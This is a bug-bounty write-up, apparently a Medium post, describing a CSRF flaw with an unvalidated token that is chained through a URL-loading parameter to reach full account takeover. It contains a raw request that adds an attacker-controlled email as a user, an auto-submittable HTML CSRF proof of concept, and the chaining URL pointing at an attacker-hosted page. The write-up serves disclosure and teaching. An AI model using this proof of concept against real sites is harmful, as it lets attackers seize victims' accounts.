Cross Site Request Forgery Critical Exploitable IN Infected Site?

Hossam Mesbah
Oct 29 · 2 min read

Hello again

In One Private Program In Hackerone

Have Found Cross Site Request Forgery Vulnerability But not the usual

I Have Turn IT Critical CSRF Mixed With

HTTP PARRAMETER PULLUTION

Lets TO Write How It?🤔

In this request To Add Another User To Account To Obtain Permission to Access The victim’s Account

POST /users/settings/ HTTP/1.1
Host: evilwite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Upgrade-Insecure-Requests: 1

ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com&first_name=mesbah&last_name=mesbah&phone=01032764848&csrf_token=PdsLuVDyQUbQZjbnl4R70oGTUIyKJfl7dHXW0j0jd4H7tAJR%2Fe%2F2P7%2B6akjtBH7thiGbmGhidK29eDguPn2dYg%3D%3D

Okay What’s the problem here The CSRF Token Its Without Any Validation

User is now added

Okay Its Was Easily CSRF What Now Create A

CSRF PoC Sure

<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://x.website.infected/settings/users" method=”POST”>
<input type=”hidden” name=”ThisAction” value=”AddUser” />
<input type=”hidden” name=”NextAction” value=”Insert” />
<input type=”hidden” name=”new&#95;user&#95;email” value=”attackeremail&#64;evil&#46;com” />
<input type=”hidden” name=”first&#95;name” value=”mesbah” />
<input type=”hidden” name=”last&#95;name” value=”mesbah” />
<input type=”hidden” name=”phone” value=”01032764848" />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

But After Search In Proxy Http History Accidentally

I Found Parrameter Named URL In Site When I put anything, it is printed in the Response

Of course Test Cross Site Scripting But it didn’t work

It took me to think for a few minutes

I found that when I put another website in this parameter Example Of This Parrameter

https://x.website.infected/public/repositry?url=https://y.website.infected/

Okay Please Think With Me Now

I Get A Free Hosting Site And Upload File To Him

Now we will change the parameter from The Website Original To My 000webhost Website

https://x.website.infected/public/repositry?url=http://5000mesbah.000webhost.com/csrf.html

Oh My God Its Worked At Website

What’s useful about that

Step 2 I Addedd JS Code With

window.onload Function To Submit Request

Now Its Full Account Takeover

By the infected site, not by the attacker

🤩🤩🤩🤩

Its More Good

And Wait For New WRITEUP By Me

vulnerability Reported

vulnerability Triagged

vulnerability :The site has not yet been paid😞😞😞😞

Good Bye

Hossam Mesbah

Written by

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade